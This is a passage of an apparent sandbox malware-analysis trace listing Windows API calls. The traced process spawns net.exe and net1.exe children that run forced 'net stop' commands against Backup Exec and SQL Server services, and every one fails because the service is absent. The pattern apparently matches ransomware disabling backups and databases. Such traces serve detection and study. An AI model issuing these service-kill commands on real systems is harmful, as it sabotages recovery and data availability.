[0216.683] _wcsicmp (_String1="users", _String2="BackupExecAgentAccelerator") returned 19 [0216.683] _wcsicmp (_String1="msg", _String2="BackupExecAgentAccelerator") returned 11 [0216.683] _wcsicmp (_String1="messenger", _String2="BackupExecAgentAccelerator") returned 11 [0216.683] _wcsicmp (_String1="receiver", _String2="BackupExecAgentAccelerator") returned 16 [0216.683] _wcsicmp (_String1="rcv", _String2="BackupExecAgentAccelerator") returned 16 [0216.683] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentAccelerator") returned 12 [0216.683] _wcsicmp (_String1="redirector", _String2="BackupExecAgentAccelerator") returned 16 [0216.683] _wcsicmp (_String1="redir", _String2="BackupExecAgentAccelerator") returned 16 [0216.683] _wcsicmp (_String1="rdr", _String2="BackupExecAgentAccelerator") returned 16 [0216.683] _wcsicmp (_String1="workstation", _String2="BackupExecAgentAccelerator") returned 21 [0216.683] _wcsicmp (_String1="work", _String2="BackupExecAgentAccelerator") returned 21 [0216.683] _wcsicmp (_String1="wksta", _String2="BackupExecAgentAccelerator") returned 21 [0216.683] _wcsicmp (_String1="prdr", _String2="BackupExecAgentAccelerator") returned 14 [0216.683] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentAccelerator") returned 2 [0216.683] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentAccelerator") returned 10 [0216.683] _wcsicmp (_String1="server", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="svr", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="srv", _String2="BackupExecAgentAccelerator") returned 17 [0216.683] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentAccelerator") returned 10 [0216.683] _wcsicmp (_String1="alerter", _String2="BackupExecAgentAccelerator") returned -1 [0216.683] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentAccelerator") returned 12 [0216.684] _wcsupr (in: _String="BackupExecAgentAccelerator" | out: _String="BACKUPEXECAGENTACCELERATOR") returned="BACKUPEXECAGENTACCELERATOR" [0216.684] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8854d8 [0216.686] GetServiceKeyNameW (in: hSCManager=0x8854d8, lpDisplayName="BACKUPEXECAGENTACCELERATOR", lpServiceName=0x68aaf0, lpcchBuffer=0xffc50 | out: lpServiceName="", lpcchBuffer=0xffc50) returned 0 [0216.687] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0216.687] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0216.687] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0216.687] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0216.687] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0216.687] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0216.687] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0216.687] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0216.687] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0216.687] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0216.687] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 14 [0216.687] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 2 [0216.687] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0216.687] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0216.687] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0216.687] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0216.687] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0216.687] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTACCELERATOR") returned -1 [0216.687] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTACCELERATOR") returned 12 [0216.687] NetServiceControl (in: servername=0x0, service="BACKUPEXECAGENTACCELERATOR", opcode=0x0, arg=0x0, bufptr=0xffc4c | out: bufptr=0xffc4c) returned 0x889 [0216.688] wcscpy_s (in: _Destination=0x68a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.688] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0216.689] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.690] GetFileType (hFile=0x26c) returned 0x3 [0216.690] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x883ca8 [0216.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x883ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0216.690] WriteFile (in: hFile=0x26c, lpBuffer=0x883ca8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xffb8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xffb8c, lpOverlapped=0x0) returned 0 [0216.690] LocalFree (hMem=0x883ca8) returned 0x0 [0216.690] GetFileType (hFile=0x26c) returned 0x3 [0216.690] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8862a0 [0216.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8862a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x88", lpUsedDefaultChar=0x0) returned 2 [0216.690] WriteFile (in: hFile=0x26c, lpBuffer=0x8862a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xffb8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xffb8c, lpOverlapped=0x0) returned 0 [0216.690] LocalFree (hMem=0x8862a0) returned 0x0 [0216.690] _ultow (in: _Dest=0x889, _Radix=1047484 | out: _Dest=0x889) returned="2185" [0216.690] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.690] GetFileType (hFile=0x26c) returned 0x3 [0216.690] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x8862a0 [0216.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x8862a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.690] WriteFile (in: hFile=0x26c, lpBuffer=0x8862a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xffb98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xffb98, lpOverlapped=0x0) returned 0 [0216.690] LocalFree (hMem=0x8862a0) returned 0x0 [0216.690] GetFileType (hFile=0x26c) returned 0x3 [0216.690] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8862a0 [0216.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8862a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x88", lpUsedDefaultChar=0x0) returned 2 [0216.691] WriteFile (in: hFile=0x26c, lpBuffer=0x8862a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xffb98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xffb98, lpOverlapped=0x0) returned 0 [0216.691] LocalFree (hMem=0x8862a0) returned 0x0 [0216.691] NetApiBufferFree (Buffer=0x881c98) returned 0x0 [0216.691] NetApiBufferFree (Buffer=0x881cb0) returned 0x0 [0216.691] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0216.691] exit (_Code=2) Process: id = "358" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b843000" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 533 os_tid = 0x648 Process: id = "359" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x52e11000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "358" os_parent_pid = "0x848" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 534 os_tid = 0x8b8 [0216.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fdac | out: lpSystemTimeAsFileTime=0x16fdac*(dwLowDateTime=0x4a6ef140, dwHighDateTime=0x1d57a87)) [0216.837] GetCurrentProcessId () returned 0xacc [0216.837] GetCurrentThreadId () returned 0x8b8 [0216.837] GetTickCount () returned 0x116fc1b [0216.837] QueryPerformanceCounter (in: lpPerformanceCount=0x16fda4 | out: lpPerformanceCount=0x16fda4*=33712147841) returned 1 [0216.837] GetModuleHandleA (lpModuleName=0x0) returned 0xa60000 [0216.837] __set_app_type (_Type=0x1) [0216.837] __p__fmode () returned 0x74eb31f4 [0216.837] __p__commode () returned 0x74eb31fc [0216.837] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa6ffe6) returned 0x0 [0216.838] __getmainargs (in: _Argc=0xa79064, _Argv=0xa7906c, _Env=0xa79068, _DoWildCard=0, _StartInfo=0xa79024 | out: _Argc=0xa79064, _Argv=0xa7906c, _Env=0xa79068) returned 0 [0216.838] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.838] GetConsoleOutputCP () returned 0x1b5 [0216.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa79080 | out: lpCPInfo=0xa79080) returned 1 [0216.838] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.841] sprintf_s (in: _DstBuf=0x16fd64, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.842] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.844] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.844] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0216.844] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fb30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.844] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x74) returned 0x35f788 [0216.844] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.844] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fd34 | out: Buffer=0x16fd34*=0x361c78) returned 0x0 [0216.844] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fd34 | out: Buffer=0x16fd34*=0x361c90) returned 0x0 [0216.844] _fileno (_File=0x74eb2900) returned -2 [0216.845] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.845] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.845] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.845] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.845] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.845] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.845] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.845] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.845] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.845] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.845] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.845] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.845] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.845] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.845] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.845] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.845] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.845] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.845] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.845] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.845] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.845] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.845] _wcsicmp (_String1="accounts", _String2="MSSQL$SQLEXPRESS") returned -12 [0216.845] _wcsicmp (_String1="computer", _String2="MSSQL$SQLEXPRESS") returned -10 [0216.845] _wcsicmp (_String1="config", _String2="MSSQL$SQLEXPRESS") returned -10 [0216.845] _wcsicmp (_String1="continue", _String2="MSSQL$SQLEXPRESS") returned -10 [0216.845] _wcsicmp (_String1="cont", _String2="MSSQL$SQLEXPRESS") returned -10 [0216.845] _wcsicmp (_String1="file", _String2="MSSQL$SQLEXPRESS") returned -7 [0216.845] _wcsicmp (_String1="files", _String2="MSSQL$SQLEXPRESS") returned -7 [0216.845] _wcsicmp (_String1="group", _String2="MSSQL$SQLEXPRESS") returned -6 [0216.845] _wcsicmp (_String1="groups", _String2="MSSQL$SQLEXPRESS") returned -6 [0216.845] _wcsicmp (_String1="help", _String2="MSSQL$SQLEXPRESS") returned -5 [0216.845] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQLEXPRESS") returned -5 [0216.845] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQLEXPRESS") returned -1 [0216.845] _wcsicmp (_String1="pause", _String2="MSSQL$SQLEXPRESS") returned 3 [0216.846] _wcsicmp (_String1="session", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="sessions", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="sess", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="share", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="start", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="stats", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="statistics", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="stop", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="time", _String2="MSSQL$SQLEXPRESS") returned 7 [0216.846] _wcsicmp (_String1="user", _String2="MSSQL$SQLEXPRESS") returned 8 [0216.846] _wcsicmp (_String1="users", _String2="MSSQL$SQLEXPRESS") returned 8 [0216.846] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0216.846] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0216.846] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.846] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.846] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQLEXPRESS") returned 1 [0216.846] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.846] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.846] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.846] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.846] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.846] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.846] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0216.846] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0216.846] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0216.846] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.846] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0216.846] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0216.846] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0216.846] _wcsupr (in: _String="MSSQL$SQLEXPRESS" | out: _String="MSSQL$SQLEXPRESS") returned="MSSQL$SQLEXPRESS" [0216.847] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x365460 [0216.849] GetServiceKeyNameW (in: hSCManager=0x365460, lpDisplayName="MSSQL$SQLEXPRESS", lpServiceName=0xa7aaf0, lpcchBuffer=0x16fcd0 | out: lpServiceName="", lpcchBuffer=0x16fcd0) returned 0 [0216.850] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0216.850] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0216.850] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.850] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.850] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.850] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.850] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0216.850] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.850] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.850] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0216.850] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0216.850] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0216.850] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0216.850] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.850] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.850] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0216.850] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0216.850] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0216.850] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0216.850] NetServiceControl (in: servername=0x0, service="MSSQL$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x16fccc | out: bufptr=0x16fccc) returned 0x889 [0216.851] wcscpy_s (in: _Destination=0xa7a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.851] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0216.852] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa7b338, nSize=0x800, Arguments=0xa79dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.853] GetFileType (hFile=0x26c) returned 0x3 [0216.853] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x363f90 [0216.853] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x363f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0216.853] WriteFile (in: hFile=0x26c, lpBuffer=0x363f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16fc0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fc0c, lpOverlapped=0x0) returned 0 [0216.853] LocalFree (hMem=0x363f90) returned 0x0 [0216.853] GetFileType (hFile=0x26c) returned 0x3 [0216.853] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366238 [0216.853] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0216.853] WriteFile (in: hFile=0x26c, lpBuffer=0x366238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fc0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fc0c, lpOverlapped=0x0) returned 0 [0216.853] LocalFree (hMem=0x366238) returned 0x0 [0216.853] _ultow (in: _Dest=0x889, _Radix=1506364 | out: _Dest=0x889) returned="2185" [0216.853] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa7b338, nSize=0x800, Arguments=0xa79dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.853] GetFileType (hFile=0x26c) returned 0x3 [0216.853] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x366238 [0216.853] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x366238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.853] WriteFile (in: hFile=0x26c, lpBuffer=0x366238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16fc18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fc18, lpOverlapped=0x0) returned 0 [0216.854] LocalFree (hMem=0x366238) returned 0x0 [0216.854] GetFileType (hFile=0x26c) returned 0x3 [0216.854] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366238 [0216.854] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0216.854] WriteFile (in: hFile=0x26c, lpBuffer=0x366238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fc18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fc18, lpOverlapped=0x0) returned 0 [0216.854] LocalFree (hMem=0x366238) returned 0x0 [0216.854] NetApiBufferFree (Buffer=0x361c78) returned 0x0 [0216.854] NetApiBufferFree (Buffer=0x361c90) returned 0x0 [0216.854] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0216.854] exit (_Code=2) Process: id = "360" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c348000" os_pid = "0x858" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 535 os_tid = 0x860 Process: id = "361" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x61264000" os_pid = "0x850" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "360" os_parent_pid = "0x858" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 536 os_tid = 0xac4 [0217.003] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fd4c | out: lpSystemTimeAsFileTime=0x36fd4c*(dwLowDateTime=0x4a892060, dwHighDateTime=0x1d57a87)) [0217.003] GetCurrentProcessId () returned 0x850 [0217.003] GetCurrentThreadId () returned 0xac4 [0217.003] GetTickCount () returned 0x116fcc7 [0217.003] QueryPerformanceCounter (in: lpPerformanceCount=0x36fd44 | out: lpPerformanceCount=0x36fd44*=33728737087) returned 1 [0217.003] GetModuleHandleA (lpModuleName=0x0) returned 0xf80000 [0217.003] __set_app_type (_Type=0x1) [0217.003] __p__fmode () returned 0x74eb31f4 [0217.003] __p__commode () returned 0x74eb31fc [0217.003] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf8ffe6) returned 0x0 [0217.003] __getmainargs (in: _Argc=0xf99064, _Argv=0xf9906c, _Env=0xf99068, _DoWildCard=0, _StartInfo=0xf99024 | out: _Argc=0xf99064, _Argv=0xf9906c, _Env=0xf99068) returned 0 [0217.003] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.004] GetConsoleOutputCP () returned 0x1b5 [0217.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf99080 | out: lpCPInfo=0xf99080) returned 1 [0217.004] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.007] sprintf_s (in: _DstBuf=0x36fd04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0217.007] setlocale (category=0, locale=".437") returned="English_United States.437" [0217.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0217.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0217.009] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" [0217.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36fad0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0217.009] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, 